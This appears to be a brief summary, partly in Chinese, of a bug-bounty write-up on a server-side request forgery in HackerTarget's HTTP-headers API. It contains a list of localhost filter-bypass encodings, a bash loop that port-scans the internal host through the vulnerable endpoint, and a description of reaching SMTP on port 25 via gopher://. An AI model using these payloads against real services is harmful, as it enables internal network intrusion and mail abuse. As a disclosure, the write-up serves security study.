Hacking the Hackers: Leveraging an SSRF in HackerTarget

本文介绍了如何利用SSRF发送email。

https://api.hackertarget.com/httpheaders/?q=<target>

正常情况下target是传送第三方网站地址,如example.com. 但是黑客发现可以发送127.0.0.1.

Initial Fix

只检测127.0.0.1.

Bypass

0  
127.00.1  
127.0.01  
0.00.0  
0.0.00  
127.1.0.1  
127.10.1  
127.1.01  
0177.1  
0177.0001.0001  
0x0.0x0.0x0.0x0  
0000.0000.0000.0000  
0x7f.0x0.0x0.0x1  
0177.0000.0000.0001  
0177.0001.0000..0001  
0x7f.0x1.0x0.0x1  
0x7f.0x1.0x1  
localtest.me  

Automation

#!/usr/bin/env bash
for port in `seq 1 9999`  
do  
    echo -e "\n\n[+] Checking Port: "$port"\n"
    curl 'https://api.hackertarget.com/httpheaders/?q=http://'$1':'$port && echo -e "\n"
done  

SMTP

经过一轮测试,发现端口25被打开。 而且服务器不但支持http://https://, 还支持dict://gopher://. (更多协议参考Medium).

于是就利用其发送email.

In a nutshell, the gopher:// protocol sends 1 character, a new line (CR+LF), and the remaining data, which allows us to send a multiline request.

Ref